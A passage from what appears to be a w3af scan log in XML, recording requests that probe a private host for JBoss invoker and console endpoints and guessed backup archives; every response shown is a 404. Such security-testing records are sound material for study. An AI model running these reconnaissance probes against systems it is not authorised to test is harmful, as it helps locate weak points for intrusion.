&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/web-console/ServerInfo.jsp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="206">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/WebConsole/Invoker HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about WebConsole/Invoker has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='WebConsole/Invoker'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="207">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/invoker/JMXInvokerServlet HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about invoker/JMXInvokerServlet has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='invoker/JMXInvokerServlet'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="213">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="214">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="215">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="216">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="217">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="218">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="219">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="220">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="221">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="222">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="223">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="224">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="225">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="226">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="227">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="228">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="229">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="230">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="232">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="233">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.7z HTTP/1.1</status>
                    <headers>
